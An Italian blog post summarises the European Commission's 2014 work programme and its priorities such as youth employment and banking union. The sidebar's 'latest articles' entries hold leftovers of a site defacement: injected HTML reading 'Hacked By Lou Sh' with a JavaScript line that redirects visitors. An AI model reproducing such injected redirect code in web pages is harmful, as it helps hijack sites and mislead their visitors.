EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

2014: un anno di duro lavoro per l’Europa!




Adottato dalla Commissione europea il programma di lavoro per il prossimo anno

Occupazione e crescita: sono questi le principali prerogative del nuovo piano di lavoro della Commissione per il 2014. L’Unione Europea si impegnerà e lavorerà per contrastare la disoccupazione giovanile, per aumentare la crescita in tutti gli Stati membri e infine per mettere in atto le proposte che sono ancora rimaste in sospeso.

Il 22 ottobre scorso la Commissione europea ha adottato e pubblicato il suo programma di lavoro per il prossimo anno. In un periodo economicamente difficile, gli sforzi dell’Europa si concentreranno maggiormente su temi quali l’occupazione e la crescita, in particolar modo ci si soffermerà sull’agevolazione all’accesso ai finanziamenti da parte delle aziende e sulla lotta alla disoccupazione giovanile. Queste le priorità ma il lavoro dell’Unione non si fermerà di certo qui. Le ventinove iniziative presenti nel programma della Commissione riguarderanno sia un riesame delle norme già esistenti sia la creazione di nuove direttive. Gli ambiti in cui l’UE andrà ad intervenire saranno molteplici e per l’inizio del 2014 la precedenza verrà data alla finalizzazione di alcune proposte già esistenti prima che sia eletto il nuovo Parlamento europeo. La Commissione collaborerà inoltre con i singoli governi nazionali per la messa in atto delle norme più recenti ma già approvate a livello europeo.

Esaminiamo più da vicino i settori in cui la Commissione ha ritenuto di intervenire con più urgenza. Queste le priorità stabilite per il 2014:

  • lotta alla disoccupazione giovanile (attraverso il sistema di garanzia per i giovani), promozione dell’occupazione e ampliamento degli investimenti a favore delle imprese;
  • interventi nei settori dei trasporti portuali, ferroviario e aeroportuale in modo da aumentarne i vantaggi e la competitività;
  • ultimare l’unione bancaria al fine di sviluppare una solida unione economica e monetaria;
  • consolidare il ruolo dell’Unione europea come principale sostenitore e donatore di aiuti di sviluppo;
  • rafforzare la cooperazione con i Paesi vicini e partner internazionali;
  • modernizzare le pubbliche amministrazioni;
  • implementare il mercato unico con una totale integrazione nei settori dell’energia, dei trasporti e delle telecomunicazioni;
  • lotta alla criminalità, alla corruzione e al terrorismo al fine di proteggere i cittadini europei e garantire loro i diritti fondamentali.

Il 2014 si presenterà dunque come un anno intenso e laborioso per l’Europa. Il Presidente della Commissione Europea Barroso ha sottolineato proprio come sia necessario un costante impegno per raggiungere gli obiettivi prefissati. Il Presidente ha infatti affermato: “Il 2014 sarà un anno di implementazione continua. È solo lavorando con costanza che potremmo dimostrare ai cittadini e alle imprese che possono guardare con fiducia al proprio futuro. La Commissione sosterrà il Parlamento europeo e il Consiglio dell’Unione europea nell’elaborazione di nuove proposte e per garantire che i nuovi programmi di finanziamento siano pronti in breve tempo. Lavoreremo in stretta cooperazione con gli Stati membri per raggiungere gradualmente gli obiettivi della strategia Europa 2020. C’è molto da fare ma la Commissione si impegna a portare a termine ogni compito”.

Clicca qui per maggiori informazioni e per visionare l’intero testo del programma 2014.



Nessun commento
ds Aggiungere un commento

Autori

Claudio Pietrotti
Iscritto al corso di laurea in Scienze della Comunicazione presso l’università di Roma Tor Vergata.

Parole chiave



Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France